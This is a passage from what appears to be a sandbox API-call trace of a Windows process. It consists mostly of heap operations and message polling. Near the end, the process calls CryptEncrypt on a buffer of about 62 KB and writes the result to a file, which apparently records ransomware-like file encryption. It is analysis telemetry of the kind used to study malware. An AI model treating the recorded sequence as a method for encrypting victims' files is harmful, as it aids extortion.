0x2a72278 [0123.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0123.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0123.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0123.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0123.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0123.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0123.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0123.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0123.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0123.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0123.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0123.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0123.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0123.104] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0123.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0123.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0123.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0123.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0123.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0123.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0123.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0123.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0123.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0123.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0123.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0123.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0123.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0123.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0123.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0123.105] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0123.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0123.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0123.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0123.106] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0123.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0123.106] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0123.106] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0123.106] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.106] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0123.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0123.107] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0123.107] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0123.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0123.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0123.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0123.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0123.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0123.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0123.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0123.107] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0123.107] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.107] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0123.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0123.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0123.107] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0123.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0123.107] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0123.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0123.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0123.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0123.107] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0123.107] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0123.107] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.107] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.107] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0123.108] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.108] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0123.108] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.108] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.108] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.108] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.108] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.108] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.108] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.108] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.108] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.108] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.108] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.108] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.108] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0123.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa288, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0123.109] CryptEncrypt (in: hKey=0x9a43c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xf524, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xf528) returned 1 [0123.109] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.109] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.109] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.109] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.110] CharLowerBuffW (in: lpsz="byte[62760]", cchLength=0xb | out: lpsz="byte[62760]") returned 0xb [0123.110] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.111] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.111] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.112] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.112] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.112] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.112] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.112] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0123.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa240, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0123.112] CryptEncrypt (in: hKey=0x9a43c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2acde70*, pdwDataLen=0x8cef60*=0xf524, dwBufLen=0xf528 | out: pbData=0x2acde70*, pdwDataLen=0x8cef60*=0xf528) returned 1 [0123.115] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.115] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.115] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.115] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.115] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.115] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.115] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.115] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0123.115] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.115] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0123.115] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.115] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.115] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0123.115] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.115] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0123.115] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.115] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.115] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.115] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.115] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0123.116] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0123.116] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0123.116] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0123.116] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0123.116] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.116] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.116] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.121] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.121] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.121] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.122] WriteFile (in: hFile=0x4f4, lpBuffer=0x2aaf410*, nNumberOfBytesToWrite=0xf528, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesWritten=0x8cf5e4*=0xf528, lpOverlapped=0x0) returned 1 [0123.125] PeekMessageW (in: 